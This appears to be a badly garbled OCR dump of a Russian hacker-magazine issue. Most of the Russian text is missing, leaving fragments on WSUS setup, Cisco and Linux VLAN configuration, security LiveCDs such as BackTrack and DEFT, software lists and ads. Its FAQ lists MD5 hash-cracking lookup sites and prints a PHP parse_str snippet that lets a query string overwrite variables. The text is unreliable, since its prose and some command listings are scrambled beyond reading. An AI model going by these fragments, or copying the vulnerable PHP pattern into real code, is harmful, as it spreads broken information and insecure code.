WSUS 2.0 (RTM Release
to manufacturing) WSUS 3.0 WSUS 3.0 SP1. WSUS 3.0 , .
Microsoft Windows Server Update Services 3.0, Microsoft TechNet.

WSUS
WSUSSetup_30SP1_x86.exe (
32 ) Microsoft .
. :
, ;
.
-

119

>> SYN/ACK

WSUS


WSUS gpedit.msc ( WinXP
Home Edition ). Windows Update
Windows.
wuau.adm.
Microsoft ,
WSUS ,
. ,
http://WSUS/.
WSUS,
. (Unassigned Computers).
WSUS.
gpupdate /force, wuauclt /detectnow
wuauclt /downloadnow. %WINDIR%\
SoftwareDistribution\Download.

warning
C WSUS


Active Directory.

120

. , ,
(, IIS),
,
.
,

Microsoft Updates. ,
,
WSUS.
. (C:\WSUS). -

, ,
. , , !
,
, . ,

.
. .
,
. , ,


. -
-
, -
WSUS.
- IIS. WSUS, 80.
, - WSUS.
8530. , .
. .
WSUS
Update Services.
.


Update Services , . .

WSUS (

). . 13 . ,
WSUS (WSUS Server
Configuration Wizard). , .

x 01 /121/ 09

>> SYN/ACK

WSUS 3.0

,
. Microsoft Update,
WSUS,
.
. WSUS
. , .
SSL-
. , , .
, .
,
Windows Update.
. .
, ,
Microsoft (, , ..)
. , WSUS . , , Win2k3
, .
, .
. .
, (Synchronization per day).
,
(Begin
initial synchronization). . ,
. .

(Unassigned),
.
,
. ,
( ).

x 01 /121/ 09

, .

, .
,
.
, , ,
.
, , . , WSUS .
, ,
.
, : , ,
WSUS. ,
,
.
.
,
. , , ,
. .

WSUS .

, . ,
. z

links
WSUS 3.0 SP1

Microsoft
go.microsoft.com/
fwlink/?linkid=93750.

info
SQL
Server
SSMS (SQL
Server Management
Studio).


WSUS


Microsoft Windows
Server Update
Services 3.0,
Microsoft
TechNet.

121

>> SYN/ACK

vlan 1

/ dhsilabs@mail.ru /

vlan 2

switch 1

t
r
u
n
k

vlan 1

vlan 2

switch 2

: ,
, . ? ,
Cisco, HP, Dlink
Linux, xBSD, Windows .
?
VLAN (Virtual Local Area Network, ) , , . , ,
, .

, .
, . ,

122

VLAN , .
, , . - , . -, VLAN
. , , , ,
. -,
. VLAN -

x 01 /121/ 09

>> SYN/ACK
vlan 1

vlan 2
internet
router
switch 1

t
r
u
n
k

vlan 1

vlan 2

switch 2


( ). -, VLAN
. VLAN
ARP-
. , , .
VLAN
. (, , VoIP, IPTV) , ,
1024 VLAN ( 802.1Q).
Double VLAN ( ), (VLAN ID) .


,
- ,

x 01 /121/ 09

VLAN. . , , ,
, - .
, VLAN? ? . , ,
.
. , Cisco, . IEEE 802.1Q.
-,
VLAN.
4 . :
TPID (Tag Protocol Identifier) .
, . 802.1Q 0x8100. 16 .
Priority .

123

>> SYN/ACK

VLAN.
.
, VLAN.

.
802.1X.
RADIUS- .

trunk-,

IEEE 802.1p. 3 .
CFI (Canonical Format Indicator) .
, MAC-: 1 , 0 . 1 .
VID (VLAN Identifier) . ,
. 12 .
. , .

VLAN
. ,
, :
( Cisco , .
trunk ports) ( , access ports).
,
.
, .
, .
.
.
VLAN,
VLAN - (
, native VLAN). .
,
.
.
VLAN 1.


Double VLAN?
, IEEE 802.1Q
VLAN 802.1Q tag Provider Edge (PE). Double VLAN
- VLAN (Serviceprovider VLAN ID, SP-VLAN ID) , VLAN . VLAN ,
Customer VLAN IDs (CVLAN IDs), ,
,
VLAN.

124

VLAN Cisco. ,
, VLAN , . ,
, Cisco,
.
, : switch1 switch2. . (fa0/N),
.
Cisco ISL (Inter Switch Link).
802.1Q.

Cisco Catalyst 3560

.
, vlan
1. (vlan 2) , Cisco:
switch1(config)
# vlan 2
switch1(config-vlan) # name myvlan

. fa0/3
fa0/4 vlan 2:
switch1(config)
switch1(config-if)
switch1(config-if)

# interface fa0/3
# switchport mode access
# switchport access vlan 2

switch1(config)
switch1(config-if)
switch1(config-if)

# interface fa0/4
# switchport mode access
# switchport access vlan 2

,
access. vlan 2.

x 01 /121/ 09

>> SYN/ACK


, , .
. ,
fa0/5 fa0/9 vlan2:
switch1(config)# interface range fa0/5 9
switch1(config-if-range)# switchport mode access
switch1(config-if-range)# switchport access vlan 2

:
switch1(config)# show vlan brief
VLAN Name
Status
Ports
---- --------- ------------------------------1
default
active
Fa0/1, Fa0/2, Fa0/10, Fa0/11,
Fa0/12, Fa0/13, Fa0/14, Fa0/15,
Fa0/16, Fa0/17, Fa0/18, Fa0/19,
Fa0/20, Fa0/21, Fa0/22, Fa0/23,
Fa0/24
2

mylan

active
Fa0/3, Fa0/4, Fa0/5, Fa0/6,
Fa0/7, Fa0/8, Fa0/9

. :
switch1(config)
switch1(config-if)
switch1(config-if)

# interface fa0/24
# switchport encapsulation dot1q
# switchport mode trunk

, vlan 2, , . , , vlan 2 (
vlan 1)
switch1(config-if)

# switchport trunk native vlan 2


:
switch1
switch1

# show interface fa0/24 trunk


# show interface fa0/24 switchport

switch1(config)
switch1(config-if)
switch1(config-if)

# interface fa0/4
# switchport mode access
# switchport access vlan 2

!
switch1(config)
switch1(config-if)
switch1(config-if)

# interface fa0/24
# switchport encapsulation dot1q
# switchport mode trunk

switch2 .
, , . ,
( ).

switch1:
switch1(config)

#ip routing

IP- (192.168.1.1).

(vlan1 default):
switch1(config)
#interface default
switch1(config-if)#ip address 192.168.1.1 255.255.255.0
switch1(config-if)
#no shutdown

:
switch1(config)
#interface vlan2
switch1(config-if)#ip address 192.168.1.1 255.255.255.0
switch1(config-if)
#no shutdown

fa0/20, . , ,
, ,
. :
switch1(config)
switch1(config-if)
switch1(config-if)#ip
switch1(config-if)

#interface fa0/20
#no switchport
address 192.168.1.1 255.255.255.0
#no shutdown

:
switch 1:
switch1(config-if)#ip route 0.0.0.0 0.0.0.0 192.168.1.1
!
interface fa0/3
switchport mode access
# switchport access vlan 2
switch1(config-if)
!

x 01 /121/ 09


Cisco . , Cisco , , ,

125

>> SYN/ACK


VLAN , .
:
,

(oversized frames). .
.
.
-. 802.1X,
RADIUS-
VLAN ( xgu.ru/wiki/802.1X__RADIUS);

D-Link. , ( ,
, ), . , D-Link . www.dlink.
ru/technology/vlan.php. VLAN D-Link
xgu.ru/wiki/VLAN__D-LINK .

VLAN Linux
Linux. , VLAN Linux
VLAN
.
802.1q,
:
# modprobe 8021q

? , Network options / 802.1Q VLAN Support.


, IP-:
# ifconfig eth0 down
# ifconfig eth0 0.0.0.0 up

, .
vconfig ( vlan vconfig , vconfig, ).
:
# vconfig add VLAN_ID

:
# vconfig add eth0 1
# vconfig add eth0 2

vlan1 vlan2
eth0. IP- :
# ifconfig eth0.1 192.168.1.10 netmask 255.255.255.0 up
# ifconfig eth0.2 192.168.2.25 netmask 255.255.255.0 up

126

VQP, VMPS VLAN


MAC-, (en.
wikipedia.org/wiki/VQP).
GVRP ( IEEE 802.1P).
VLAN
(www.javvin.
com/protocolGVRP.html). Cisco
VTP (en.wikipedia.
org/wiki/VTP).
, ,

( ):
# route add default gw 192.168.1.254


/proc:
# cat /proc/net/vlan/eth0.1

. VLAN , . ,
802.1q /etc/modules.conf, VLAN /
etc/network/interfaces, , :
auto myvlan
iface myvlan inet static

address 192.168.1.1

netmask 255.255.255.0

vlan_raw_device eth0

VLAN Windows: ?
Windows VLAN,
, . : Intel Advanced
Networking Suite (iANS), 3com DynamicAccess, Broadcom Advanced Server
Program (BASP). ,
, , .
VLAN Windows,
VLAN,
Linux-.

, VLAN, , , .
:
ru.wikipedia.org/wiki/VLAN VLAN;
www1.bstu.by/wiki/index.php?title=VLAN_802.1Q 802.1Q;
people.freebsd.org/~arved/vlan/vlan_en.html VLAN
FreeBSD (FreeBSD VLAN mini HowTo);
www.opennet.ru/tips/info/1381.shtml
Q-in-Q,
. z

x 01 /121/ 09

>> SYN/ACK
grinder
/ grinder@ua.fm, tux.in.ua /

LiveCD:


Linux

.
, . LiveCD ,
, .
,
.

.
, , Asterisk
..
. , -

128

,
. . ,
! ,
, :
;

;
;
.

x 01 /121/ 09

>> SYN/ACK

, GParted
!

Clonezilla


GParted (GNOME Partition Editor, gparted.sf.net),
*nix, LiveCD- (
90 ), Debian. GParted
,
PartitionMagic ext2, ext3, FAT16, FAT32, HFS, HFS+, UFS,
JFS, NTFS, ReiserFS, Reiser4, XFS. , LVM2 FUSE.
Fluxbox. , 64 .
, CD, USB. PXE- .
.

Partition Image (www.partimage.org),
. GParted
(, UFS, NFS NTFS ).
TestDisk (www.cgsecurity.org/wiki/TestDisk),
.
Midnight Commander, Vim Nano . GParted Live
, - , , Partition Image .
Clonezilla (www.clonezilla.org).
Partition Image, ntfsclone, partclone, dd udpcast (Samba, NFS, SSH). : Clonezilla Live Clonezilla SE (Server
Edition). , .
40 ( ) 10 .
CD, USB-, (PXE).

2.6.25.16 Linux, Reiser4,


Btrfs ( , Oracle ZFS), SMB NFS.
1.1.0 :
;
32 (i486 ) 64.
230 , , .
,
<F2> <F7>. ( framebuffer, , USB ..), .
(memtest),
DOS FreeDOS (freedos),
Graphical Boot Manager (gag), (aida),
Dariks Boot and Nuke
(dban), (mhdd).
, .
.
0.3, SystemRescueCD X-
WindowMaker, , startx.
, .
, fdisk, GNU/Parted, GParted , : e2fsprogs, reiserfsprogs, reiser4progs,
xfsprogs, jfsutils, ntfstools (ntfsresize, ntfsclone ), dosfstools,
sfdisk. , , . mtools, DOS-.
PartImage ( ). gag,
GRUB LILO.
SystemRescueCD , ,
, Windows. Midnight
Commander. : vim, elvis, nano, joe,
qemacs Leafpad. , SystemRescueCD, . (gzip, bzip, rar, tar ),
CD/DVD (cdrecord, dvd-rw-tools, cdrtools, mkisoft). dban, , ,
shred, wipe.
ClamAV (
freshclam).


,
,
. SystemRescueCD (www.sysresccd.org).
LiveCD ( ). SystemRescueCD ,
, , , .
SystemRescueCD Gentoo.

x 01 /121/ 09

129

>> SYN/ACK

BackTrack

KDE . , ,
SystemRescueCD - (DHCP) WiFi.
root, .
. 2.7 , . GParted, .
SystemRescueCD Samba, ftp-- , , .
, SSH, VNC-. - BackTrack
- , 11 . : lynx, elinks Bon Echo ( Firefox 2.0.0.16), , , Nmap, (SecurityFocus, PacketStorm, Metaspl0it Framework
netcat nslookup DNS-.
2/3 .), , , Cisco, ,
- BackTrack
VoIP-, .. ,
links
GParted
LiveCD . VoIP & Telephony Analysis 32 .

, - gparted.sf.net.
. (, . - , , - ..). SystemRescueCD
2003-2005 , , , Office
.
Games. BackTrack
www.
BackTrack (www.remote-exploit.org) . slapt-get, sysresccd.org.
2004 : Auditor ( slapt-get
Security Linux WHAX ( Whoppix),
OpenSource-. Auditor Security The Swiss Army

Knife for security assessments Clonezilla www.
Linux-, 300
clonezilla.org.
. WHAX (White Hat + SLAX) BackTrack
(penetration
test).
www.remote exploit.org.

. final3, Ubuntu

2008 nUbuntu (Network Ubuntu,

. BackTrack Slackware
www.nubuntu.org),
BackTrack 12.0 SLAX (www.slax.org).

(forums.
KDE 3.5.7
.
remote-exploit.org)
Fluxbox. LiveCD. Fluxbox. ,
Wiki (wiki.remote USB-

exploit.org) .
VMware. .
Ubuntu,
KDE
,
DEFT
( ), Fluxbox, KDE , VESA-,
.
Linux - www.deftlinux. .
, Alpha,
net.
LiveCD ,
.

nUbuntu

130

x 01 /121/ 09

>> SYN/ACK

BackTrack

Xubuntu DEFT
, ).

, . DEFT Linux (www.deftlinux.net). Digital
Wiki (forums.remote-exploit.org, Evidence & Forensic Toolkit.
wiki.remote-exploit.org).
, . DEFT v1 2006
DEFT
Kubuntu 6.10. .
, 60% Xubuntu 8.10 XFce. , , . , , , Ubuntu. DEFT
, , , - Ubuntu, . ,
. . , ,
. .
. XFce, deft-gui.
, ,
,
, Ubuntu
. , ,
.
BackTrack USB- Asus Eee PC ,
LiveCD, BackTrack
. 3 USB version ( 783 ).
OpenSource-,
1 ( Asus Eee PC SD-), FAT32.
, Sleuth Kit
ISO-. Windows (TSK) Autopsy (Autopsy Forensic Browser).
WinRAR UltraISO, ISOBuster.
RAW*nix :
, dd dd_rescue.
, ,
# mount -o loop -t iso9660 bt3-final.iso /mnt/iso
. .
AFF (Advanced Forensics Format).
bt3 boot.
. .
bt3 bootinst.bat ( Windows) bootinst.sh (*nix).
,
, :
.
Gpart, parted Gparted QTparted, TestDisk.
# boot/syslinux/syslinux -d boot/syslinux /dev/sdd
Foremost.
Windows:
trID. Steg detect OutGuess.
K:\boot\syslinux\syslinux.exe -ma -d \boot\syslinux K:
hex- hex dump KHex. / Ophcrack John
/dev/sdd K: .
the Ripper. ClamAV,
Asus Eee PC boot/syslinux/
chrootkit, rkhunter. .
syslinux.cfg, APPEND vga=0x317 initrd=/
DEFT Samba, OpenSSH , RDesktop. ,
boot/initrd.gz ( SD
Network
/dev/sda) changes=/dev/sda2.
Nessus, Nmap, FireShark, Ettercap, Kismet AirSnort. z

BackTrack
USB-
Asus Eee PC

x 01 /121/ 09

131

>> units
mehovushka
/ mehovushechka@yandex.ru /

psycho:



. ,
. , . ?
? ?

- , , , ,
. .
, ,
. ,
.

.



, , .
, . . , ,
? .
,
. , -,
,
. , .
,
? .
, . , ,
, ,
.
,
. , , -
: .
! : ][
- , -
.
,
. ,
,
, .

132

. ,
,
.
, , .
.
,
- , .
, ,
.
,
,
. , ,
, !
,
, - ,
. -
, .
, ?


,
, , .
( , ,
) .
, .
, .
, , ,
. ,
? , , .
? , ? , , !..

, , ,
, , ,
.
x 01 /121/ 09

>> units

, ,
. , ,
. ,
, , , .
,
.
, , . ,
: , .
, .
.
,
, .
, , history . .
x 01 /121/ 09

() ,
, , . -


, 500
, . . , . , ,
,
, ,
.

133

>> units


.
, .
.
, , , . .
, , , .
.
.
.


- . !
: ; ,
. ,
, , ,
, .
. , (,
, ), .
,
.
, ,
, , ,
. , ? ?
, , , .

,
.

= ?
, ,
, , .
. ,
,
.

, , , , -

134


.
,
! !
. ,
, , . , .
, , .
? ,
, ,
?


2008
. Psycho:
, .
.
x 01 /121/ 09

>> units


, ,
, ,
, , . ,

,
.
, .
, .
, -
.
,
. .

,
, ,
..
, ?
. , , ,
.
, , . .

, . , . , , ,
, .
.
, -

- ,
,
.
, , .
.

. ,
,
.
, , .
,
.

,
, , . , , .



,
. .
, .
- . , .

,
, .
. ,
. , ,
- ,
. ? ,
-
. , -
, .. , .
,
. , .
, ,
, , - .
, pr- ,
.
.
,
,
.

, .
. ,

, - , , .
,
, , ,
, , - , ,
, , , ,
. , -
, .
. z

info
,
, ,
, ,
?
,

.

links
psyfactor.org



.

x 01 /121/ 09

135

>> units

/ icq 884888 /

FAQ UNITED:

Q:
md5
MD5 ?
A:
- Reverse
MD5 lookup in multiple databases, : http://md5.noisette.
ch.

String to hash , , :
http://us.md5.crysm.net
http://gdataonline.com
http://md5.rednoize.com
http://schwett.com
http://authsecu.com
http://passcracking.com
http://md5.cryptobitch.de
http://md5oogle.com
http://insidepro.com

136

http://undosha1.com
http://csthis.com
http://hashcrack.com
http://md5.benramsey.com

md5.noisette.ch
API .
,
: http://md5.noisette.ch/md5.php?h
ash=2a0231531bc1a7fc29e2fa8d64352ae9,
xml-:
<md5lookup>
<hash>2a0231531bc1a7fc29e2fa8d
64352ae9</hash>
<string>noisette</string>
</md5lookup>

API, ,
:).

Q: ,
.
,
?
A: :
1. (,
, inurl
site);
2. (
10 ,

);
3. .
:
awt.win32utils.com/datac/;
4. - ,
(,
$0.01 ,
:)).
x 01 /121/ 09

>> units

Q: PHP.

(/ POST,
GET-,
..)?
A:
- AcidRoot! php-
PhpSploit Class
,
HTTP.
( ) http://mgsdl.free.fr/?2:3.
:
PHP 4/PHP 5;
GET/POST-;
cookies ;
basic-;
;
- (
POST);

php-.
Q: Skype,
IM
?
A:
. Nimbuzz Mobile.
,
startup Mobile 2.0 Europe.
Nimbuzz:
Nimbuzz Mobile
VoIP IM-, : ICQ,
Skype, GoogleTalk, Jabber, MSN,
Yahoo AIM,
.
Nimbuzz 1000 , ,
Symbian, Java Windows
Mobile.
Nimbuzz VoIP (mVoIP) ,
- .
Nimbuzz Mobile
: Wi-Fi, 3G
GPRS/EDGE.
Nimbuzz -,
, presence () Buzz ().


http://www.nimbuzz.com/ru/
mobile.
x 01 /121/ 09

Q: php-
parse_str()? ?
A: ,
-. ,
parse_str(string str [, array arr])
str,
URL,
, arr.


. ,
script.php, :
<?php
$var = 'init';
parse_str(
$_SERVER['QUERY_STRING']);
print $var;
?>


: script.php?var=new, $var
new! arbitrary
variable overwrite.
:
<?php
//script.php?array[]=new
$array = array('init');
parse_str($_SERVER['QUERY_
STRING']);
print_r($array); // [0] =>
init, [1] => new
// script.php?array=new
$array = array('init');
parse_str($_SERVER[QUERY_
STRING'],$array); // [array]
=> new
print_r($array);
?>


: http://www.acid-root.new.fr.
Q: ,
id, ls, cat. -,
.
A: !
:
'uname -a'
: , ,
, ,
;
'cat /etc/issue'

;
'uptime' ;
'chkconfig --list | more'
/
;
'last -[- ]' , ;
'ps' , ;
'top' ,
;
'df -h' ;
'du -sh /home/username'

;
'find [] -type d -perm 0777 -ls'
, ;
'egrep -v '^#|^[:blank:]*$' []'

(
);
'cat []|grep word'
'', 'word';
'cat []|less'


Enter;
'echo [] > out.txt'
echo out.txt;
'echo [] >> out.txt'
echo out.
txt;
'echo "[]'ls -la'"'
+ ls
-la ( ,
ls -la,
echo).

Q: NOD32.

?
A:
( 3- ):
1.
(, C:\
nod32update\);
2.
.
;
3. ;
4. ;
5.
(C:\
nod32update\) ;

137

>> units

6.
,
;
7.

;
8. :).
P.S. C:\Program Files\ESET\
ESET NOD32 Antivirus.
em0* .dat.
Q: -?
A: Web- (Web-) ,
, ,
,
. Web-c
, ,

XML-.
, XML. ,

SOAP; -, ,
WSDL. - HTTP

.

.
:
Java Web Services Development Pack;
Microsoft .NET-;
Zend Framework;
Mono development platform Novell.
-,
,
,
,
webservices.aeroflot.ru.
Q: Google,
,
Yahoo?
A: ! :
site
+ ,
: 'site:yahoo.com';
hostname
, : 'hostname:
autos.yahoo.co';
link ,
, : 'link:http://
autos.yahoo.com/' (,

138


);
url , : 'url:http://edit.autos.yahoo.
com/repair/tree/0.html';
inurl , :
'inurl:bulgarian';
intitle , : 'intitle:Bulgarian'.
:
''
;
' +' .

;
' +' .

;
' OR ' , , .
Yahoo!
Shortcuts (! ). :
'map'
;
weather ;
define ;
news .
,

http://help.yahoo.com/
l/us/yahoo/search/basics/basics-04.html.
Q: ?
A:
Open++ (www.freewebs.com/dengdun/en/
openxx.htm). , ,
,
.

, , API- .
Q: .

, . ?
A:
.
. ,
,

.
old_user .
(

, Documents and Settings).

Q:
? - c icq?
, QIP , Miranda
.
A: ,
. ,
, , -,
, , , -,
.
.

UIN #1 ICQ 5.1
. ICQ web ICQ. AOL ICQ Lite

ICQ 5.1. , ,
QIP? ,
LoginID, .. ,
,
QIP
5.1 (
, ).
, ICQ 5.1
, . , ,
, , LoginID, ,
.
Q:
PHP- Java-. :
?
A: , ,

,
, ,
. Quercus
PHP (http://www.caucho.com/resin-3.0/
quercus), PHP,
Java.
(Apache Tomcat, Jetty,
Apache). ? , ,
, Java.
,
php_java PHP/Java Bridge
(php-java-bridge.sourceforge.net). ,
PHP ,
Java-.
Jython (www.
jython.org) Java- Python. JRuby (jruby.codehaus.org)
Groovy (jruby.codehaus.org), Java Python, Smalltalk. z
x 01 /121/ 09

>Net
A1 Website
Safari 3.2
Firefox 3.1b2
Free Music Zilla 1.0.5
OpenVPN 2.1_rc15
Opera 10.0 Alpha 1
Kiwi CatTools 3.3.14
Web Forum Reader 2.0
WiSSH

>Misc
Ditto_Portable 3.15.4
DriverMax 4.7
MyUSBOnly 4.17
Game Overlay 1.0.7
Camtasia Studio 6.0.0
Typle 2.0
Dicto 2.7.4.7
re:PocketMod
O&K Work Spy 1.01
Link Shell Extension

>Games
OpenTTD 0.6.3

>Development
Axure RP Pro 5.1
Adobe AIR 1.5
Milescript 0.8.1
mono 2.0
PatchFactory 3.3
Qt 4.4.3
Qt for Windows CE
3
CodeSmith 5.0.4
Mercurial 1.1.1
DeployLX 3.2
Google Native Client 1.1.28
JavaFX 1.0 SDK
Titanium SDK 0.1
Resource Builder 3.0.0.18

>>WINDOWS
>Dailysoft
7-Zip 4.62
AutoRuns 9.35
DAEMON Tools Lite 4.30.1
Download Master 5.5.7.1145
FarPowerPack 1.15
FileZilla Client 3.1.6
IrfanView 4.22
JDataSaver
K-Lite Mega Codec Pack 4.4.2
Miranda IM 0.7.13
Mozilla Firefox 3.0.5
Notepad++ 5.1.2
Opera browser 9.63
PuTTY 0.60
QIP Infium v9020
Skype stable
Total Commander 7.04a
Unlocker 1.8.7
Winamp Media Player 5.541
Xakep CD DataSaver 5.2

>>UNIX
>Desktop
YamiPod 1.7
Lancelot 1.0.3
Amarok 2.0
Yakuake 2.9.4
VLC 0.9.8a
Beryl 0.2.1
Brasero 0.8.4
Adobe Flash Player 10.0.12.36
Google Gadgets 0.10.4
Corel Photo-Paint 9
EarthBrowser 3.0.4
Songbird 1.0
PDF Cube 0.0.3b
ScreenKast 0.1.4
modmaker 0.2
ImageMagick 6.4.7-10

>System
Driver Magician V3.32
MojoPac 2.0
Priority Saver 1.98
O&K Print Watch 4.3.0.1730
Unknown Device Identifier 6.0
Wuby 8.10
Sandboxie 3.3
Outpost Firewall Pro 2009
Outpost Antivirus Pro 2009
MySQL 5.0.67
MySQL 6.0alpha
PostgreSQL 8.3
Super Flexible File Synchronizer 4.51
USB Disk Security V5.1.0.15
HDDlife 3.1.157

>Secutity
AxCrypt 1.6.4.4
Angry IP Scanner 3.0-beta3
BestCrypt Traveller 1.02.8
Jetico Personal Firewall for Windows
v.2.0.2.8
BCWipe 3.11.7
PassX 1.1
Odysseus 2.0.0.84
Wireshark 1.0.5
Capsa 6.9
ServiceCapture 1.2.27
RogueScanner
nipper 0.12.5
bsqlbf v2

>Multimedia
Artweaver 0.5.7
BB FlashBack 2.5
Inksaver 2.0
ObjectDock 1.9
PowerDVD 8
AUTOPANO v1.03

Whisher 3.0
DomainScan Pro 2.8beta2
Deluge 1.1.0
WebDrive 7.0
Ad Muncher 4.72

>Security
Privoxy 3.0.10
Tor 0.2.0.32
CGIProxy 2.1
Snare 1.5.0
TrueCrypt 6.1a
Nessus 2.2.10
Bluediving 0.9
Rootkit Hunter 1.3.2
F-Prot Antivirus for Linux
Workstations 4.6.7
THC-SecureDelete 3.1
DNS Flood Detector 1.12

>Net
Skype 2.0.068
Transmission 1.40
Mozilla Firefox 3.0.5
Opera 9.63
Wireshark 1.0.5
KCheckGmail 0.5.7.7
KTorrent 3.1.5
SIM Instant Messenger 0.9.4.3
aMule 2.2.2
BitTorrent 5.2.2
LimeWire 4.18.8
Valknut 0.3.22
rTorrent 0.8.0
Flock 2.0.2
LFTP 3.7.7
Netscape Navigator 9.0.0.6
Pidgin 2.5.3

>Games
Frozen-Bubble

>Devel
Adobe AIR 1.5
Qt Creator 0.9.1b
Qt 4.4.3
MySQL Workbench 5.1.5a
Python 3.0
jython-2.2.1
Groovy 1.5
Nasm 2.05.01
ArgoUML 0.26
Bluefish 1.0.7
libdvdcss 1.2.10
libjpeg v6b
libpcap 1.0.0
libxml2 2.6.31
Mantis 1.1.6
jdk-6u11
JavaFX 1.0

KOffice 1.6.3
Google Desktop 1.0.1
Wally 1.3.2
Google Earth 4.2
ISO Master 1.3.4
Krusader 1.90
Kpackage 3.5.8
Google Native Client

>X-Distr
openSUSE 11.1

>System
Filelight 1.0
Linux NTFS 1.13.1
Linux Kernel 2.6.28 RC9
ati 8.12
nVidia 180.16b
SystemImager 4.0.2
Ext2 Filesystems Utilities 1.41.2
e2retrieve
Linice 2.6
IBAM 0.5.1
pppd-logger 0.2
cpuburn 1.4
KLogWatch 2.0.3

>Server
TeamSpeak2 2.0.32.60
MySQL 5.0.75
Bacula 2.4.3
vsftpd 2.0.7
Apache 2.2.11
LiteSpeed Web Server 3.3.23
Open DC Hub 0.7.14
Ventrilo Server 2.3.1
webcam_server 0.50
UnrealIRCd 3.2.6
TFTP Server 1.4
NASLite 2.06
Bind 9.6.0
Asterisk 1.4.22
OpenSSH 5.1
Openvpn 2.1rc15
PostgreSQL 8.3.5
Squid 3.0.stable11
Samba 3.2.6
Snort 2.8.4.b
Postfix 2.5.5
Sendmail 8.14.3
Dhcp 4.1.0
Honeyd 1.5c
OpenLDAP 2.4.13
Cups 1.4b2

01(121) 2009

2100 .

( 15%
)

. ,

( ) 3-
.
5(4

]]


v2 ? . 73
#11|57| 2008
:
, ,
,

08021



G TA I V

>
W R AT H O F T H E L I C H K I N G




 .1"35:
"1$0



31(



80-'&/45&*/



Total DVD


iPhone 3G

Meridian 810

+CD

. 1

$2

Apple

Erdinger

: -2108
3S-GTE

:
!

www.mconline.ru

19

24
ComStorm
SMART

32

44

Mio Leap
G50

Nokia
E71

66

38

30
HTC
Touch Pro

www.mconline.ru

Fujitsu Siemens
Amilo Xa 3530

DVDXpert

26

30

iPhone 3G

50
120 000

22

2009

BOSE

31

, LAS VEGAS SANDS: .

w w w. m y b i z . r u

GPS-

11 (97) 2008

: Intel Montevina AMD Puma

30 ,
31 .

08

Reference Video System

1980 12

11 (34) 2008

?
!

EUROPEAN
SNOWBOARD
MAGAZINE
ONBOARDMAGAZINE.RU

| 2008 | 11 (32)

www.maxi-tuning.ru

2009
#01 (37)
: 100

,
,

 
A


www.totalfootball.ru

ONBOARDPARK.RU

37









RUSSIAN EDITION #01 (37) 2009

, .


,

VW Caddy

Honda Prelude

Toyota Celica

-2108

Subaru Impreza

Maxi tuning

ONBOARD

11(34)_Cover_Semak+.indd 1

Total Football

10-10-2008 18:44:50

! !

6
DVD + DVD:
- 155
( 25% , )

#11|57| 2008
:
, ,
,

032-054

2100

DDr3

 

73

v2 ? . 73



rossf
ire x

fi wi-fi
re so
und system

12

3720

12[52] 08

12

DVD

61


DIABLO III

AV-

20 000



rossf
ire x

fi wi-fi
re so
und system

CALL
OF DUTY:
WORLD
AT WAR





WRATH
OF THE
LICH KING

>

$0.."/%
$0/26&3
3&%"-&35

7"-,:3*"
$)30/*$-&4

DDr3

 

3
.7

IV

C A L L O F D U T Y: WO R L D AT WA R


%7%


> DIABLO III > MAFIA II >

#BZPOFUUB

032-054

1$14148**9#09%4141
%4 141

]]]] 

,

, :

GRAND
THEFT
AUTO

>

11 (92) 2008

W
W W.P C- GA ME R RU
WWW.PC-GAMER.RU

> > 2009 > 01 (77)

2009

K E F 5

4 607157 100056

Total DVD 92 2008

20 XXI

DVD

61


1.  , ,
www.glc.ru.
2. .
3.  :
subscribe@glc.ru;
8 (495) 780-88-24;
119021, ,

. , . 11, . 44,
, .

 ;
20
.
,
.
,
. , , .

+DVD 6 1200 .
, , 8(495)780-88-29 ( )
8(800)200-3-999 ( , , ).
info@glc.ru www.GLC.ru

>> units

/ xpuzzle@real.xakep.ru,
www.sklyaroff.ru /

X-PUZZLE:

.
, .
, ,

z.

,
.


X-PUZZLE:
<< >>
MAC-, , Ethernet-,
, .
IEEE 802.3, , 6
Ethernet- MAC- (00-50-56C0-0001), 6 MAC- (00-0C-29-07-7E-86).
, (0800h IP-),
IP-. RFC-791,
IP-, , IP-
12 IP- ( c0h a8h
8eh 80h : 192.168.142.128). IP-
16 IP- (c0h a8h 8eh 01h : 192.168.142.1). IP-,
9 IP-,
06 , IP- TCP-. TCP RFC-793, ,
( d8cch 55500
) (0087h 135 ).

<<
>>
. 1 RJ-45
. 2
. 3
. 4 VPN-
. 5
. 6 HASP-

<<
?>>
, , ,
7 ( 7). .

<< >>
: This is a rubric XPuzzle.
rot13,
,
13 .

142

x 01 /121/ 09

>> units
WindoWs

. 64

. 42

 UIN C tjat.CoM

w w w.xakep.ru
11 (119) 2008

 09 (117) 2008

Rustok.C

Imagine
Cup 2008





.32

. 58

macOS X
. 62

ultimate-
 PHP
. 58

. 64

w w w.xakep.ru
12 (120) 2008

RunCMS

. 50

. 122

ICQ
. 74

HTTP

,
-


. 38

GooGle
Talk

IM-
GooGle
. 44


web-

DNS


DNS-
. 94


web 2.0
. 20

. 24


Playstation



. 28

AJAX


,

AJAX-
. 98

iphone


SDK
. 88


,
. .


hatelove.com (61 ), ,
I hate Xakep!. ,
. ,
I love Xakep!. hatelove.com
.

,
:

and, xor or,


, .
, .

x 01 /121/ 09

143

http://

WWW2

JavaScript


OpenSource
,
!

JSusers
www.jsusers.com

, JavaScript.
- . : ,
jQuery ExtJS,
.


Microsoft Visio

Ohloh
www.ohloh.net

, , - .
, Apache ,
7Zip-. :
(
,
). . , , Mozilla Firefox
13 , (50 ), Perl (119 )
36.5 JavaScript?!

5
VMware-
LAMP-

Ubuntu !

Gliffy
www.gliffy.com

Microsoft Visio Dia.


,
Windows Visio, /,
? Gliffy ,
. UML-
,
, ,
-,
. ,
. , , JPEG/
PNG/SVG MS Visio. ,
- - .
!

144

Elastic Server On-Demand


www.elasticserver.com


, .
, , (,
LAMP Apache, PHP MySQL) Create
server. (
VMware, Parallels, Xen VirualIron),
(Ubuntu DaiSY Linux), (NAT ), . , ,

.
x 01 /121/ 09

>> inside

/ STEP@GAMELAND. RU/

444

x 11 /107/ 07